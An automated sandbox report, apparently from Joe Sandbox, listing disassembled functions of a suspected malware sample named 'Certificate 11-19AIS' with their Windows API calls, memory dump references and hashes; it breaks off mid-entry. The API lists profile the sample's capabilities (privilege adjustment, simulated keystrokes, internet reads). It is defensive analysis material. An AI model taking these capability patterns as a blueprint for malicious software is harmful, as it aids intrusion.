                                                                              Function 007B9B60 Relevance: 7.3, Strings: 5, Instructions: 1055COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                              • API String ID: 0-1546025612
                                                                              • Opcode ID: b7d4d61a0ecfc12281dd18e03736baf58143f0d619d12966aef2997e09ecafbe
                                                                              • Instruction ID: ac218a6233dcde0b73bc6fb867cc811ebb613fc7ea9b3af9cec11da7f6e52015
                                                                              • Opcode Fuzzy Hash: b7d4d61a0ecfc12281dd18e03736baf58143f0d619d12966aef2997e09ecafbe
                                                                              • Instruction Fuzzy Hash: 38926C71E0021ADBDF24DF58C8907EDB7B1FB94314F14819AEA16EB280E7789D81DB91
                                                                              Function 007CE01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,007CE014,756F0AE0,007CDEF1,0084DC38,?,?), ref: 007CE02C
                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 007CE03E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                              • API String ID: 2574300362-192647395
                                                                              • Opcode ID: fc393dc6add0a2798de8651423b94884b46bcca9738949b15b6c800d7dcefd1d
                                                                              • Instruction ID: 3d1cf6445ec601a5f25c9b9eb19e87e38ea534caa124357ad857f3d2458a57e2
                                                                              • Opcode Fuzzy Hash: fc393dc6add0a2798de8651423b94884b46bcca9738949b15b6c800d7dcefd1d
                                                                              • Instruction Fuzzy Hash: 5DD0C770500B129FD7315F65FC09B56B7D4FB44711F29886EE495D2250D7BCD8C08B90
                                                                              Function 007F13CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007F13DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: lstrlen
                                                                              • String ID: ($|
                                                                              • API String ID: 1659193697-1631851259
                                                                              • Opcode ID: d1c20f058a4878337f6550d33f471a43438a04d35e3f1d6158ac9be29abac2bc
                                                                              • Instruction ID: 3aab32f131236b6e393aed3df1d0799461838a94a958a8e056d5790216e42a0f
                                                                              • Opcode Fuzzy Hash: d1c20f058a4878337f6550d33f471a43438a04d35e3f1d6158ac9be29abac2bc
                                                                              • Instruction Fuzzy Hash: 09321375A00609DFC728CF69C480A6AB7F0FF88320B51C46EE59ADB3A1E774E941CB40
                                                                              Function 007CB11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
                                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 007CB22F
                                                                                • Part of subcall function 007CB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 007CB5A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Proc$LongWindow
                                                                              • String ID:
                                                                              • API String ID: 2749884682-0
                                                                              • Opcode ID: 5c315f24ed2bb194e7c9290fad2e74843cbacee1103e24142d9ff1121a119e54
                                                                              • Instruction ID: 7fb6ec01547cbbc4b2888fb9259fca092b150a11e800d0fb1a9ff279bea94227
                                                                              • Opcode Fuzzy Hash: 5c315f24ed2bb194e7c9290fad2e74843cbacee1103e24142d9ff1121a119e54
                                                                              • Instruction Fuzzy Hash: 30A13360114119BAEB28AE2E6C8FFBF3B5CFB92344F14411DF906D6592DB2CDC809676
                                                                              Function 00804EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,008043BF,00000000), ref: 00804FA6
                                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00804FD2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                                              • String ID:
                                                                              • API String ID: 599397726-0
                                                                              • Opcode ID: ee08fd79e038802c8bc317b1edb763dc2d3f60d6198b09c2ee261ce932d84386
                                                                              • Instruction ID: e6df62ef616ab1b5171759b5f94f256c20d96a7667d27aaf7ee01868b96a8f3c
                                                                              • Opcode Fuzzy Hash: ee08fd79e038802c8bc317b1edb763dc2d3f60d6198b09c2ee261ce932d84386
                                                                              • Instruction Fuzzy Hash: 4F4105B164460ABFEB609E94DC85EBF77BCFB40368F10502EF305E61C0DA719E419AA0
                                                                              Function 007FE1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 007FE20D
                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 007FE267
                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 007FE2B4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                              • String ID:
                                                                              • API String ID: 1682464887-0
                                                                              • Opcode ID: 363a2ab3062db902eeac81601f38b60e6a75cba6828b8e365ffdf5839f7dca7e
                                                                              • Instruction ID: f9cf12d06929172e9ac606c5e8bb5a36864a4e85f19fa04ab94b69866bfa6985
                                                                              • Opcode Fuzzy Hash: 363a2ab3062db902eeac81601f38b60e6a75cba6828b8e365ffdf5839f7dca7e
                                                                              • Instruction Fuzzy Hash: 60213C75A00618EFCB00EFA5D885EAEFBB8FF88310F0484A9E905AB351DB359915CB50
                                                                              Function 007EB134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007CF4EA: std::exception::exception.LIBCMT ref: 007CF51E
                                                                                • Part of subcall function 007CF4EA: __CxxThrowException@8.LIBCMT ref: 007CF533
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007EB180
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007EB1AD
                                                                              • GetLastError.KERNEL32 ref: 007EB1BA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 1922334811-0
                                                                              • Opcode ID: 062636582dcd5e9c3158bba0837b580cae083ee96601f6ec1dbfaa767718f346
                                                                              • Instruction ID: 7caf8099709fdc5647ab59a4773156f300b8b0170bd5d998976b0b5d4992acde
                                                                              • Opcode Fuzzy Hash: 062636582dcd5e9c3158bba0837b580cae083ee96601f6ec1dbfaa767718f346
                                                                              • Instruction Fuzzy Hash: 2511C1B2504304AFE718AF65ECC5D6BBBBDFB44720B20892EF05693241EB74FC418A60
                                                                              Function 007F6606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007F6623
                                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 007F6664
                                                                              • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007F666F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                              • String ID:
                                                                              • API String ID: 33631002-0
                                                                              • Opcode ID: 1349d2e01b76173df56c39456af7c8c4d045d95a5f2c81e060ad7cf4dfbb91bb
                                                                              • Instruction ID: 9454681bb97b3811bff9856c7978e8c8e54032e973b6efc98b2d2b954959ae79
                                                                              • Opcode Fuzzy Hash: 1349d2e01b76173df56c39456af7c8c4d045d95a5f2c81e060ad7cf4dfbb91bb
                                                                              • Instruction Fuzzy Hash: 5B110C71E01228BFDB108FA5AC45BAEBBBCEB45B10F104556F900E7290D6B45A059BA5
                                                                              Function 007F71FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 007F7223
                                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007F723A
                                                                              • FreeSid.ADVAPI32(?), ref: 007F724A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                              • String ID:
                                                                              • API String ID: 3429775523-0
                                                                              • Opcode ID: 86beff065c1da20633473d5f12d9ac3e615be3debd99125bf2264a803665f766
                                                                              • Instruction ID: 36c6ea1de912a2d04f6c082e0d10ba91c949418275090b470aae8641a9a201ab
                                                                              • Opcode Fuzzy Hash: 86beff065c1da20633473d5f12d9ac3e615be3debd99125bf2264a803665f766
                                                                              • Instruction Fuzzy Hash: 88F01D76A14309BFDF04DFF4DD99AEEBBB8FF48601F504869A602E2191E2749A448B10
                                                                              Function 007FF56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 007FF599
                                                                              • FindClose.KERNEL32(00000000), ref: 007FF5C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID:
                                                                              • API String ID: 2295610775-0
                                                                              • Opcode ID: 47a56a0226729ca3f3bf6f99493b0260c41b6a0b24d2b9ee728e86e89a3a07ae
                                                                              • Instruction ID: 5115f6fdf14403aa520f2f94a539ede7ded4f50ddee07b74c7e213b6e7e24935
                                                                              • Opcode Fuzzy Hash: 47a56a0226729ca3f3bf6f99493b0260c41b6a0b24d2b9ee728e86e89a3a07ae
                                                                              • Instruction Fuzzy Hash: F81161726046049FD710EF28D849A2EF7E9FF84324F04891EF9A5DB391DF34A9118B95
                                                                              Function 007FCE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0080BE6A,?,?,00000000,?), ref: 007FCEA7
                                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0080BE6A,?,?,00000000,?), ref: 007FCEB9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFormatLastMessage
                                                                              • String ID:
                                                                              • API String ID: 3479602957-0
                                                                              • Opcode ID: 48b5e90e75d01feffe91ef3f942d433348fcedb362dbca8a2dae0fbb99446638
                                                                              • Instruction ID: 89c9d46bf71e8509cee358932cac9dd4c1e67b62583045c05d79f595d6d7b8d5
                                                                              • Opcode Fuzzy Hash: 48b5e90e75d01feffe91ef3f942d433348fcedb362dbca8a2dae0fbb99446638
                                                                              • Instruction Fuzzy Hash: EEF0823110032DEBDB11ABA4DC49FFA776DBF48351F008565F915D6281D634DA50CBA1
                                                                              Function 007F411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 007F4153
                                                                              • keybd_event.USER32(?,7608C0D0,?,00000000), ref: 007F4166
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: InputSendkeybd_event
                                                                              • String ID:
                                                                              • API String ID: 3536248340-0
                                                                              • Opcode ID: e575f749c044dfc0301c6c67b6459385446f7501fd46bd031b23a3c0875a9fe9
                                                                              • Instruction ID: 39d07aecf572016867848fc154fd5401b4e2c604c3777118d04457161d6ae3cd
                                                                              • Opcode Fuzzy Hash: e575f749c044dfc0301c6c67b6459385446f7501fd46bd031b23a3c0875a9fe9
                                                                              • Instruction Fuzzy Hash: 73F0677080034DAFDB058FA4C805BBEBBB0FF00305F00840AF966A6292D7B986129FA0
                                                                              Function 007EAB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007EACC0), ref: 007EAB99
                                                                              • CloseHandle.KERNEL32(?,?,007EACC0), ref: 007EABAB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                                              • String ID:
                                                                              • API String ID: 81990902-0
                                                                              • Opcode ID: 05e36900e6222f7684e2ca8e8d26cd11ef883a90bf29d864a06ccdd4ba81afb6
                                                                              • Instruction ID: 3adcfd84e6bd3f266f62f4af6fe5f481a698f35ba9b82cf382ba9d6e81ec5b8d
                                                                              • Opcode Fuzzy Hash: 05e36900e6222f7684e2ca8e8d26cd11ef883a90bf29d864a06ccdd4ba81afb6
                                                                              • Instruction Fuzzy Hash: 69E0E672004A10EFE7252F55FC09DB777EAEF44320710882DF55A81470D7666C90DB50
                                                                              Function 007D81AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,007D6DB3,-0000031A,?,?,00000001), ref: 007D81B1
                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 007D81BA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: 30285876036ae0664a0dc5ef1c851c90dcf65cf35bb3cdd158a29afc38fbe421
                                                                              • Instruction ID: 2d30e7f1fd6b7fb30778cadc99662ca2e3a231ecf645ff27b91e92e1fc403385
                                                                              • Opcode Fuzzy Hash: 30285876036ae0664a0dc5ef1c851c90dcf65cf35bb3cdd158a29afc38fbe421
                                                                              • Instruction Fuzzy Hash: E3B09231044708ABDB002BA1FC09B987F68FB88656F008410F60D49261AB7258208A92
                                                                              Function 007B77B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove
                                                                              • String ID:
                                                                              • API String ID: 4104443479-0
                                                                              • Opcode ID: afc4287bcc921d7daa7307c48bc1fb3fb94766412711c96ea49813579fba0c6d
                                                                              • Instruction ID: c79d593665abca1966c58ef68b0b4cf9ca02a5764367ee1d76d54054e71429a0
                                                                              • Opcode Fuzzy Hash: afc4287bcc921d7daa7307c48bc1fb3fb94766412711c96ea49813579fba0c6d
                                                                              • Instruction Fuzzy Hash: 55A21774A04219CFDB28CF58C4947EDBBB1FF88314F2581A9E859AB391D7349A81DF90
                                                                              Function 007DD1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 534fd45e0a6c3da671503193347a7052ac362a034ab039535836067bd3c8700a
                                                                              • Instruction ID: 699ff14e8636027b739f49964039d36debacbc6d37045d5f66d44546ffca5ada
                                                                              • Opcode Fuzzy Hash: 534fd45e0a6c3da671503193347a7052ac362a034ab039535836067bd3c8700a
                                                                              • Instruction Fuzzy Hash: 59320321D69F014DD7239638D832336A2A8EFB73D4F55D737F819B5AA6EB29D8834100
                                                                              Function 007B96C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
